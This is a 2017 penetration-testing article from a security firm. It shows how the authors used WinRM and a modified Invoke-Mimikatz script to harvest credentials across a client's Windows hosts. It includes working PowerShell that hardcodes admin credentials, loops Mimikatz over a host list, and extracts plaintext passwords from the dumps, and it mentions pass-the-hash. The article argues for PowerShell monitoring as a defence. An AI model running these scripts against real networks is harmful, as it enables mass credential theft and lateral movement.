

Invoke-Mimikatz – Seven in One Go

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1. Preface

This paper was written in 2017 as part of a research project at scip AG, Switzerland. It was initially published online at <https://www.scip.ch/en/?labs.20170309> and is available in English and German. Providing our clients with innovative research for the information technology of the future is an essential part of our company culture.

2. Introduction

PowerShell monitoring [1] is one of the measures we strongly recommend to our clients as part of every *internal assessment* [2]. Often, this measure is not implemented for financial reasons. In this article, I will demonstrate why it is worth investing in monitoring, using the example of an actual attack.

3. Scenario

During an internal penetration test, we managed to gain local administration rights on a client computer. The password of the local administrator account was also used elsewhere on client computers. In addition, the *Windows Remote Management* [3] service (WinRM) was active on all systems. A connection via WinRM was established with the command `Enter-PsSession`:

```
Enter-PsSession -ComputerName
target1.example.org -Credential
target1\administrator
[target1.example.org]: PS
C:\Users\Administrator\Documents> ps
```

With this, we were in a position to execute commands with local administrator rights on other systems. The goal was now to getuser credentials on each active device. We used the PowerShell script *Invoke-Mimikatz.ps1* [4] by *Joe Bialek* [5] as a basis. *Invoke-Mimikatz* has already implemented a function to execute *Mimikatz* [6] on remote computers via WinRM.

```
Invoke-Mimikatz -DumpCreds -ComputerName
target1.example.org
```

To read access data as simply and efficiently as possible, we had to make a small adjustment to the *Invoke-Mimikatz*, and also wrote our own script for automating and logging these activities.

4. Automated reading of access data

We began by expanding the script so that the credentials for the remote connection could be stored in the script itself. *Invoke-Mimikatz* normally uses the credentials of the user account that launches the script. So here we added the following lines to the `Main()` function:

```
$Username = "$ComputerName\administrator"
$PasswordPlain = "SeCuRePa$$1"
$Password = ConvertTo-SecureString
$PasswordPlain -AsPlainText -Force
$Cred = New-Object
System.Management.Automation.PSCredential -
ArgumentList $Username, $Password

If ($ComputerName -eq $null -or $ComputerName
-imatch "\s*$")
{
    Invoke-Command -ScriptBlock
$RemoteScriptBlock -ArgumentList
@($PEBytes64, $PEBytes32, "Void", 0, "",
$ExeArgs) -Credential $Cred
}
Else
{
    Invoke-Command -ScriptBlock
$RemoteScriptBlock -ArgumentList
@($PEBytes64, $PEBytes32, "Void", 0, "",
$ExeArgs) -ComputerName $ComputerName -
Credential $Cred
}
```

Security notice: Saving plain-text passwords is *bad* security practice and should be avoided at all costs. In the *TechNet Wiki* [7] Microsoft describes how to store encrypted passwords in a file or in the registry. Here it's important to ensure that only the user who has encrypted the password is able to decrypt it. A password is stored as a `SecureString`:

```
PS C:\> $SecurePassword = Read-Host -Prompt
"Enter password" -AsSecureString
Enter password: *****
PS C:\> $SecureStringAsPlainText =
$SecurePassword | ConvertFrom-SecureString
PS C:\> $SecureStringAsPlainText
01000000d08c9ddf0115d118c7a00c04fc297eb01000
0009a344ea59d3a184888877bbb6cc1a14000000002
000...
```

An encrypted, saved password is read from a file and then converted into an object so that it can be used in a script:

```
$SecureString = $SecureStringAsPlainText |
ConvertTo-SecureString
```

We built a *wrapper script* [8] (GitHub [9]) that reads hostnames from a file and accesses them sequentially to read user credentials.

```

$BasePath = "C:\tmp"
$Timestamp = (Get-Date).ToString("yyyyMd")
$Protocol =
"$BasePath\protocol-$timestamp.txt"
$Hosts = Get-Content $HostFile

Foreach ($ComputerName in $Hosts) {
    $Time = Get-Date -Format G
    $StartMessage = "[*] $Time - Connecting
to $ComputerName..."
    $StartMessage | Tee-Object -Append -
FilePath $Protocol

    $LogMimikatz =
"$BasePath\cred_$ComputerName.log"

    Try {
        Invoke-Mimikatz -ComputerName
$ComputerName -ErrorAction Stop -
ErrorVariable ErrorInvokeMimikatz | Out-File
-Encoding utf8 $LogMimikatz
    }
    Catch {
        $Time = Get-Date -Format G
        $ErrorMessage = "[!] $Time - ERROR:
$ComputerName - " +
$ErrorInvokeMimikatz[1].FullyQualifiedErrorId
        $ErrorMessage | Tee-Object -Append -
FilePath $Protocol
        $ErrorInvokeMimikatz = $null
    }

    $Time = Get-Date -Format G
    $EndMessage = "[*] $Time - $ComputerName
done"
    $EndMessage | Tee-Object -Append -
FilePath $Protocol
}

```

The script requires the parameter `HostFile`, in which all hosts are listed (one host per line). A rudimentary log is kept, describing when a host was accessed and when the processing was completed. The output of `Invoke-Mimikatz` is stored in a separate file. Should there be an error with a connection – if, for example, the system is inaccessible or access is denied, this is recorded in the log.

5. Evaluating the access data

Once the script is executed, a `Mimikatz` output file is available for each host. In order to quickly extract information such as plain-text passwords, we use *another PowerShell script* [10] (GitHub [11]). Using a *regular expression* (RegEx), every entry with a password that is not blank can be stored in a file or printed out on the screen.

```

$PasswordRegex = "\s+\*\s\Username\s+:\s(?
<username>[a-zA-Z0-9]+)
[\r\n]+\s+\*\s\Domain\s+:\s(?<domain>[a-zA-Z0-
9]+)[\r\n]+\s+\*\s>Password\s+:\s(?<password>
(?:\(\null\)).*?)[\r\n]+"
$PasswordOutput = New-Object
System.Collections.Generic.List[System.Object

```

```

]

Foreach ($LogFile in Get-ChildItem -Recurse
$Path) {
    $Content = Get-Content -Raw -Path
$LogFile
    $PasswordMatches = Select-String -
InputObject $Content -AllMatches -Pattern
$PasswordRegex

    Foreach ($Match in
$PasswordMatches.Matches) {
        $SearchEntry = New-Object
System.Object
        $SearchEntry | Add-Member -
NotePropertyName "Username" -
NotePropertyValue
$Match.Groups["username"].Value
        $SearchEntry | Add-Member -
NotePropertyName "Domain" -NotePropertyValue
$Match.Groups["domain"].Value
        $SearchEntry | Add-Member -
NotePropertyName "Password" -
NotePropertyValue
$Match.Groups["password"].Value
        $PasswordOutput.Add($SearchEntry)
    }
}

$PasswordOutput = ($PasswordOutput | Sort-
Object -Property Username -Unique)

```

A further function of the script extracts all NTLM hashes, which can then be used for both *pass-the-hash attacks* and for *breaking the password using hashcat* [12].

By the way, this assessment caught more than seven passwords in one go. Active monitoring of PowerShell activity might not have prevented the attack, but the attack on user credentials would not have been undiscovered.

6. External Links

- [1] <https://www.scip.ch/en/?labs.20160407>
- [2] <https://www.scip.ch/en/?offense>
- [3] <https://msdn.microsoft.com/en-us/library/aa384426%28v%3Dvs.85%29.aspx>
- [4] <https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1>
- [5] <https://twitter.com/JosephBialek>
- [6] <https://github.com/gentilkiwi/mimikatz>
- [7] <https://social.technet.microsoft.com/wiki/contents/articles/4546-working-with-passwords-secure-strings-and-credentials-in-windows-powershell.aspx>
- [8] <https://www.scip.ch/labs/files/Invoke-MimikatzNetwork.ps1>
- [9] <https://github.com/scipag/PowerShellUtilities/blob/master/Invoke-MimikatzNetwork.ps1>
- [10] <https://www.scip.ch/labs/files/Select-MimikatzPasswords.ps1>
- [11] <https://github.com/scipag/PowerShellUtilities/blob/master/Select-MimikatzPasswords.ps1>
- [12] <https://www.scip.ch/en/?labs.20170112>